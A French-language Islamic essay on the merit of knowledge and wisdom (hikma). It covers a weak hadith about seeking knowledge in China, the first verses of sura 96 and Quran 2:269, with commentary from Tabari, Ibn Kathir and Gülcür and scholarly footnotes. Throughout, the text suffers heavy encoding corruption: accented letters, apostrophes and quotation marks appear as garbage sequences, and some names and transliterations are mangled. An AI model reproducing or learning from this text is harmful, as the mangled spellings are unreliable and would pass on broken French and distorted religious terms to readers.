Celui A� qui la hikma a A�tA� accordA�e bA�nA�ficie d’un bien immense

Une cA�lA?bre parole attribuA�e au ProphA?te A�(i�?) A�exhorte le croyant A� A�A�chercher la connaissance jusqua��en Chine A�. PrA�cisons-le d’emblA�e, ce hadA�th, de ce qui rA�sulte des analyses des spA�cialistes, est daa��if (faible) et selon beaucoup trA?s probablement inventA� (mawdA�a��, forgA�).[1] Il se peut donc que le ProphA?te (i�?) na��aie jamais formulA� ces paroles, pourtant les savants sont unanimes A� soutenir que le sens de cette parole est correct car il rejoint d’autres dires prophA�tiques. En effet, ce dernier n’a-t-il pas clairement dit a�� et cela est rapportA� de faA�on authentique a�� que A� Celui qui emprunte une voie A� la recherche da��un savoir, AllA?h lui rendra facile son chemin au Paradis A�[2]A�?

La premiA?re source des musulmans est le Coran, Livre rA�vA�lA� vingt-trois annA�es durant et venant confirmer les prA�cA�dentes rA�vA�lations et parachever la religion. Ce dernier mentionne 335 versets qui traitent da��al-a�?ilm (la science) et ses dA�rivA�s liA�s au savoir et A� la connaissance.[3] Da��ailleurs, les cinq premiers versets[4], rA�vA�lA�s par Dieu au ProphA?te (i�?) A�A�sur le mont de HirA?, au travers de la��ange Gabriel (JibrA�l), sont d’une importance fondamentaleA�:

1.)A�Lis ! Au nom de ton Seigneur qui a crA�A�,

2.)A�qui a crA�A� la��homme da��une adhA�rence.

3.)A�Lis ! Ton Seigneur est le TrA?s Noble,

4.)A�qui a enseignA� par la plume (le calame),

5.)A�a enseignA� A� la��Homme ce qua��il ne savait pas.

La premiA?re injonction divine est de lire ! Lire au nom du Seigneur, A�le CrA�ateur de toute chose.[5] Le premier mot de la rA�vA�lation coranique ne peut A?tre considA�rA� comme anodin, d’autant plus que la suite de la sourate insiste surA�l’importanceA�du savoir.A�AprA?s avoir fait mention de la crA�ation de la��univers de maniA?re gA�nA�rale, il est fait mention de la crA�ation de la��Homme en particulier en mettant la��accent sur le fait que Dieu la��a crA�A� dans une forme parfaite mais A� partir da��un A�tat des plus modestes et insignifiants (une adhA�rence). Sayyid Abul A’la Maududi rapporte dans son Tafhim al-Qura��anA�que le motA�a�?alaq (ici traduit par adhA�rence), est le pluriel de a�?alaqah, qui signifie sang coagulA�. Il sa��agit dans ce verset de la��A�tat primaire de la��embryon qui apparaA�t quelques jours aprA?s la conception et qui se transformera graduellement pour prendre la forme da��un A?tre humain. Le mot ‘alaqA�fait allusionA�A� l’A�tape de la fixation de l’embryon sur la paroi utA�rine et met l’accent sur l’importance de la contemplation de la crA�ation ainsi que sur la nA�cessitA� de l’A�tudier en dA�tails. Au troisiA?me verset, une nouvelle injonction de lire est rA�vA�lA�e et marque ainsi l’insistance de la prescription. A�Puis, aux quatriA?me et cinquiA?me versets a�� bouclant la premiA?re rA�vA�lation coranique au ProphA?te (i�?) A�a��, AllA?h le TrA?s-Haut mentionne successivement l’enseignement et le calame, puis l’enseignement (l’apprentissage de l’Homme) et le savoir. Musa Kazim GA?lcA?r, dans son livre sur al-adA?b al-muA?charat[6] (la��A�thique du comportement biensA�ant), place l’A�tude et l’apprentissage comme des caractA�ristiques essentielles au dA�veloppement A�thique du musulman et ditA�:A�A�A�un des grands bienfaits que Dieu a accordA�s A� l’Homme a�� A�A�lequel est, A� ses dA�buts, un A?tre insignifiant a�� est la connaissance, qui a portA� l’HumanitA� au plus haut niveau, au-dessus de toutes les autres crA�atures. Comme les Hommes ont reA�u, outre la connaissance, la��usage du calame, ils sont donc chargA�s de rA�pandre cette connaissance, en l’utilisant comme outil de dA�veloppement et de progrA?s, et en la sauvegardant pour les gA�nA�rations futures.A�A�[7]

Le TrA?s-Haut dit dans le Coran : {Et celui A� qui la hikma (souvent traduit par sagesse) a A�tA� accordA�e, bA�nA�ficie vraiment d’un bien immense.}[8] At-TabarA� rapporte dans son tafsA�r que MujA?hid a dit que al-hikma A�peut A?tre traduite ici par al-a�?ilm (la science) et la comprA�hensionA�; alors que selon d’autres, elle dA�signe A�A�la justesse dans les paroles et les actes et a le sens deA�isA?baA�: le fait de toucher juste. […] [ou] l’intelligence (al-a�?aql) […].A�A�[9] A�Pierre GodA� prA�cise que A�A�dans l’esprit de MujA?hid il peut s’agir ici de science traditionnelle en gA�nA�ral ou plus spA�cialement de la science du Coran.A�A�[10]A� Selon Ibn KathA�r : A�A�Ce qui est A�tabli, c’est que la sagesse, comme l’affirment la plupart des doctes, n’est pas une spA�cificitA� de la prophA�tie, mais recouvre une signification plus gA�nA�rale, son plus haut degrA� A�tant [toutefois] la prophA�tie.A�A�[11] Il rapporte A�galement a�� au sujet deA�al-hikmaA�dans ce verset a�� qu’Ibn Masa��A�d a dit que le ProphA?te (i�?) s’est exprimA� en ces termes : A�A� Il n’y a que deux personnesA�qua��ilA�soit permis d’envier : celle A� qui Dieu a donnA� la fortune et qui a le courage de consumer son bien pour la cause de la vA�ritA� ; celle A� qui Dieu a donnA� la sagesse et qui l’applique aux hommes et la leur enseigne.A�A�[12]A� Le Dr. GA?lcA?r considA?re que A�A�dans ce verset, le termeA�al-hikma [a��] signifie « la connaissance bA�nA�fique ».A�A�[13] Une connaissance bA�nA�fique A�tant celle qui A�lA?ve le niveau de celui qui la cultive en augmentant sa piA�tA�, mais aussi, qui devient profitable pour ceux qui l’entourent. La connaissance rA�ellement bA�nA�fique ne peut A?tre dissociA�e d’une augmentation spirituelle chez la personne croyante qui la��acquiert. En ce sens, un verset affirmeA�: {Parmi les serviteurs de Dieu, seuls les savants Le craignent (comme il se devrait).}[14]

{AllA?h A�lA?vera en degrA�s ceux da��entre vous qui auront cru et ceux qui auront reA�u le savoir.}[15]


[1] Citons, par exemple, Al-BayhaqA� qui a ditA�: A�A�Ce texte est cA�lA?bre, mais ca��est un hadA�th faible, il a A�tA� rapportA� selon des chaA�nes de transmission qui sont toutes faibles…A�A� (Shua��ab al-ImA?n).A�Ibn al-QaysaranA� a A�galement critiquA� le hadA�th en raison de la prA�sence da��AbA� Atikah ibn Salman dans sa transmission,A� qui selon ses propos A� rejetA� dans les ahA?dA�th au plus haut niveau (Munkar al-hadA�th jiddan) A�. (TadhkirA?t al-HuffA?dh). Ibn Al-JawzA�, mentionne ce hadith et cite A� son propos les paroles da��Ibn HibbA?nA�: A�A�invalide/rejetA�, il na��a aucune baseA�A� (Al Mawdua��A?tA�1/215). De mA?me, Adh-DhahA?bA� reprend les paroles da��Ibn HibbA?n dansA�Tartib al-Mawdua��A?tA�(p. 52, nA� 111) et As-SakhA?wA�i dansA�Maqaasid al-HasanA?hA�(p. 86, nA� 125).

[2] SahA�h Muslim [2699].

[3] Hassan Amdouni, Le Savoir DVD, 2008A�: A�A�La quA?te du savoir est une obligationA�A�.

[4] Coran : 96, 1-5.

[5] PrA�cisons que le mot A�A�iqraA�A� a un double sens : celui de lire et celui de rA�citer ;A�la lecture A� une A�tendue gA�nA�rale tandis que la rA�citation est propre au Coran.

[6] En turc, adabA� muaAYeret. Ouvrage traduit en franA�ais (rA�fA�rence A� la note suivante).

[7] GA?lcA?r Musa Kazim, De la perfection de la personnalitA�, un guide complet des bonnes maniA?res et des qualitA�s morales en islam, Izmir, A�ditions du Nil, 2009, p. 21.

[8] Coran, 2A�: 269.

[9] At-TabarA�, Commentaire du Coran – AbrA�gA�, traduit et annotA� par Pierre GodA�, Paris, A�ditions da��Art les Heures Claires, 1984, vol.2, A�p. 488.

[10] Op. cit., p. 490.

[11] Ibn KathA�r, La��authentique de la��exA�gA?se da��Ibn KathA�r (A�dition critique de MustafA? ibn al-a�?AdawA�), Paris, Maison da��Ennour, 2013, vol. 1, p. 370.

[12] Ibidem. Parole rapportA� en termes voisins par Al-BukhA?rA� [73] et Muslim [63].

[13] Op. cit., p.22.

[14] Coran, 35 : 28.

[15] Coran, 58 : 11.

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